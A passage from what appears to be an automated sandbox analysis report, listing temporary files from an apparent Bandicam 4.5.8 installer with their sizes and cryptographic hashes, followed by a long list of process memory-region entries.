                                                                    c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JPIEG.tmp\iswin7logo.dll
                                                                    Filesize

                                                                    39KB

                                                                    MD5

                                                                    1ea948aad25ddd347d9b80bef6df9779

                                                                    SHA1

                                                                    0be971e67a6c3b1297e572d97c14f74b05dafed3

                                                                    SHA256

                                                                    30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

                                                                    SHA512

                                                                    f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LUSMS.tmp\Bandicam.4.5.8.1673.tmp
                                                                    Filesize

                                                                    939KB

                                                                    MD5

                                                                    2624dd7f54b9132196ea129114ac9828

                                                                    SHA1

                                                                    50082f8b6e179fa509d1575fd4536abdcbf229fe

                                                                    SHA256

                                                                    9b92942e7066168d9b95fb9004abe21254b28a076ff1988bea781d75fc48276f

                                                                    SHA512

                                                                    fd07a56e7fd9289cc5e7ebd9b1185950a708ee5edd609be67d38be5364f549ff08014abfabd38b6df7bb223f9f9031f17a53c37614441ac37c2592e6df17b31e

                                                                  • memory/8-217-0x0000000000000000-mapping.dmp
                                                                  • memory/8-220-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/8-218-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/8-221-0x0000000000400000-0x0000000000492000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/368-163-0x0000000000000000-mapping.dmp
                                                                  • memory/448-216-0x0000000008070000-0x0000000008092000-memory.dmp
                                                                    Filesize

                                                                    136KB

                                                                  • memory/448-192-0x0000000000000000-mapping.dmp
                                                                  • memory/448-214-0x0000000008390000-0x0000000008934000-memory.dmp
                                                                    Filesize

                                                                    5.6MB

                                                                  • memory/448-215-0x0000000007ED0000-0x0000000007F62000-memory.dmp
                                                                    Filesize

                                                                    584KB

                                                                  • memory/448-207-0x00000000055B0000-0x000000000564C000-memory.dmp
                                                                    Filesize

                                                                    624KB

                                                                  • memory/448-198-0x0000000000B10000-0x0000000000C4A000-memory.dmp
                                                                    Filesize

                                                                    1.2MB

                                                                  • memory/620-136-0x0000000000000000-mapping.dmp
                                                                  • memory/800-204-0x0000000000000000-mapping.dmp
                                                                  • memory/1048-195-0x0000000000000000-mapping.dmp
                                                                  • memory/1076-158-0x0000000000000000-mapping.dmp
                                                                  • memory/1160-199-0x0000000000000000-mapping.dmp
                                                                  • memory/1368-146-0x0000000000000000-mapping.dmp
                                                                  • memory/1372-196-0x0000000000000000-mapping.dmp
                                                                  • memory/1512-132-0x0000000000000000-mapping.dmp
                                                                  • memory/1628-130-0x0000000000400000-0x00000000004C7000-memory.dmp
                                                                    Filesize

                                                                    796KB

                                                                  • memory/1628-134-0x0000000000400000-0x00000000004C7000-memory.dmp
                                                                    Filesize

                                                                    796KB

                                                                  • memory/1712-167-0x0000000000000000-mapping.dmp
                                                                  • memory/1808-171-0x0000000000000000-mapping.dmp
                                                                  • memory/2084-153-0x0000000000000000-mapping.dmp
                                                                  • memory/2144-176-0x0000000000000000-mapping.dmp
                                                                  • memory/2324-190-0x0000000000000000-mapping.dmp
                                                                  • memory/2336-213-0x0000000000000000-mapping.dmp
                                                                  • memory/2504-224-0x0000000002600000-0x0000000002603000-memory.dmp
                                                                    Filesize

                                                                    12KB

                                                                  • memory/2504-162-0x0000000007410000-0x000000000741F000-memory.dmp
                                                                    Filesize

                                                                    60KB

                                                                  • memory/2504-144-0x0000000000000000-mapping.dmp
                                                                  • memory/2504-223-0x0000000074BA0000-0x0000000074BBB000-memory.dmp
                                                                    Filesize

                                                                    108KB

                                                                  • memory/2512-178-0x0000000000000000-mapping.dmp
                                                                  • memory/2524-210-0x0000000000000000-mapping.dmp
                                                                  • memory/2700-150-0x0000000000000000-mapping.dmp
                                                                  • memory/2792-200-0x0000000000000000-mapping.dmp
                                                                  • memory/3004-206-0x0000000000000000-mapping.dmp
                                                                  • memory/3032-202-0x0000000000000000-mapping.dmp
                                                                  • memory/3084-166-0x0000000000000000-mapping.dmp
                                                                  • memory/3128-208-0x0000000000000000-mapping.dmp
                                                                  • memory/3408-155-0x0000000000000000-mapping.dmp
                                                                  • memory/3520-209-0x0000000000000000-mapping.dmp
                                                                  • memory/3596-193-0x0000000000000000-mapping.dmp
                                                                  • memory/3612-205-0x0000000000000000-mapping.dmp
                                                                  • memory/3700-152-0x0000000000000000-mapping.dmp
                                                                  • memory/3832-203-0x0000000000000000-mapping.dmp
                                                                  • memory/4000-211-0x0000000000000000-mapping.dmp
                                                                  • memory/4036-177-0x0000000000000000-mapping.dmp
                                                                  • memory/4132-154-0x0000000000000000-mapping.dmp
                                                                  • memory/4196-197-0x0000000000000000-mapping.dmp
                                                                  • memory/4316-212-0x0000000000000000-mapping.dmp
                                                                  • memory/4388-157-0x0000000000000000-mapping.dmp
                                                                  • memory/4428-164-0x0000000000000000-mapping.dmp
                                                                  • memory/4528-138-0x0000000000000000-mapping.dmp
                                                                  • memory/4528-140-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                    Filesize

                                                                    120KB

                                                                  • memory/4528-147-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                    Filesize

                                                                    120KB

                                                                  • memory/4532-182-0x0000000000000000-mapping.dmp
                                                                  • memory/4536-156-0x0000000000000000-mapping.dmp
                                                                  • memory/4580-172-0x0000000000000000-mapping.dmp
                                                                  • memory/4700-187-0x0000000000000000-mapping.dmp
                                                                  • memory/4932-201-0x0000000000000000-mapping.dmp
                                                                  • memory/5048-183-0x0000000000000000-mapping.dmp
                                                                  • memory/5068-188-0x0000000000000000-mapping.dmp